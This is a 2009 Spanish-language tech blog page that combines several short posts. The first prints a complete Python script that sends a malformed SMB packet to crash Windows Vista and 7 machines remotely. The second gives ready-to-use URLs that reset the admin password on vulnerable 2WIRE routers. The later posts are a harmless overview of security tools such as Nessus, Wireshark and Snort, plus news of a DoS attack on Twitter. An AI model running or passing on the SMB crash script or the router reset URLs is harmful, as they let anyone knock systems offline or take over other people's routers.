Vulnerabilidad encontrada en el procotolo SMB en windows vista y windows 7, con éste exploit el atacante puede congelar(crash) remotamente cualquiera de éstos 2 sistemas operativos.
Por el momento no la hay, simplemente cerrar puertos del SMB.
#!/usr/bin/python #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> =) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()
Ha sido publicada una vulnerabilidad de los routers 2WIRE en el cual puedes cambiar el password de Administrador si éste ya fué configurado.
Los modelos vulnerables son:
Y los firmwares vulnerables:
Firmware NO VULNERABLE:
5.29.135.5
Para establecer una nueva contraseña si ésta ya fué establecida, simplemente vamos a ésta dirección:
http://gateway.2wire.net?xslt?page=CD35_SETUP_01
Si quieres resetear el password:
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
Descargar video demostrativo.
Los problemas con los routers 2WIRE continuan , y ésto afecta a grandes compañias que utilizan éste tipo de aparatos, lo más recomendable es comprar otro tipo de router ó actualizar el firmware de nuestro router 2WIRE.
Aquí les traigo algunas de las herramientas de seguridad libres más populares sacadas de la lista de Top 100 Network Security Tools de insecure.org:
Nessus es el mejor escaner de vulnerabilidades “Open Source” que hay disponible en la red y el que mejor funciona sobre UNIX. Se actualiza constantemente, con más de 11.000 plugins gratuitos (requiere registro y aceptar el EULA). Las características principales incluyen chequeos de seguridad remotos y locales (con autenticación) , una arquitectura cliente/servidor con un interfaz gráfico GTK (GIMP toolkit), y un Lenguaje de Scripting de Ataque Nessus (NASL) para escribir tus propios plugins o entender los existentes. Nessus 3 ahora es de código cerrado, pero es de coste gratuito a menos que desees los plugins más nuevos.
Wireshark (conocido hasta el verano del 2006 como Ethereal debido a un conflicto de marca registrada) es un fantástico analizador de protocolos de red “Open Source” para Unix y Windows. Permite que examines los datos de una red o de un archivo de captura almacenado en disco. Puedes visualizar directamente los datos de la captura, descendiendo en el nivel de detalle del paquete que necesitas. Wireshark tiene varias características de gran potencia, incluyendo un amplio lenguaje de filtrado de paquetes para su visualización y la capacidad de visualizar una sesión TCP reconstruida. También soporta cientos de protocolos y tipos de red. Incluye una versión en modo consola, como tcpdump, llamada tethereal.
Un consejo de seguridad, Ethereal ha sufrido docenas de vulnerabilidades explotables en remoto, así que mantenlo actualizado y se cuidadoso donde lo ejecutes si va a funcionar en redes poco seguras u hostiles (tales como conferencias de la seguridad).
Este ligero sistema de detección y prevención de intrusiones de red sobresale en el análisis y registro del tráfico de paquetes sobre redes TCP/IP. A través del análisis del protocolo, buscando en su contenido, y de varios pre procesadores, Snort detecta miles de gusanos y virus, intentos de explotar vulnerabilidades, escaneos de puertos, y otros comportamientos sospechosos. Snort utiliza un lenguaje flexible basado en reglas (rules) para describir el tráfico que debe filtrar o permitir, y un motor modular de detección. También se pueden monitorizar las alertas de Snort mediante un interfaz web (Basic Analysis and Security Engine – BASE)
La libre distribuciñon de Snort lo hace ideal para trabajar en usuarios, pequeñas empresas, y otras redes. La empresa de su creador, SourceFire , ofrece una línea de productos complementarios con más características destinadas a nivel empresarial y actualizaciones de reglas en tiempo real. Ofrecen de forma gratuita (requiere registro) una actualización de las reglas con 5 días de retraso, y también puedes encontrar muchas reglas gratuitas muy buenas en el Bleeding Edge Snort
Al mismo tiempo, es una gran herramienta para explorar y depurar los errores de una red, puesto que puede crear casi cualquier clase de conexión que necesites, incluyendo puertos que enlazan con conexiones entrantes. La versión original de Netcat fue lanzada por Hobbit en 1995, pero no se ha mantenido a pesar de su inmenso renombre. A veces puede ser difícil encontrar nc110.tgz. La flexibilidad y la utilidad de esta herramienta han incitado a mucha otra gente a escribir otras implementaciones de Netcat – a menudo con las características modernas no encontradas en la original. Una de las más interesantes es Socat, que amplía Netcat para soportar muchos otros tipos de sockets, cifrado SSL, proxies SOCK, y muchos más. También existe Ncat de Chris Gibson, que ofrece aún más características mientras que es tan portable y compacto como el resto.
Como Nessus, la función de Retina es explorar todas las maquinas de una red e informar sobre cualquier vulnerabilidad encontrada. Fue escrita por eEye, quienes son buenos conocedores de las investigaciones de seguridad informática.
En debian/Ubuntu , no hay mayores complicaciones:
# aptitude install nessus snort netcat
Leyendo en el blog de Linuxman, me entero que twitter ha sufrido un ataque DoS y estuvo fuera de servicio por algunas horas, éstos son algunos de los mensajes de los administradores:
We are defending against a denial-of-service attack, and will update status again shortly.
Update: the site is back up, but we are continuing to defend against and recover from this attack.
Pueden checar el status de twitter desde el Twitter Status.
Todos los derechos reservados. Tecnologia.
September 11, 2009 | Etiquetado en: 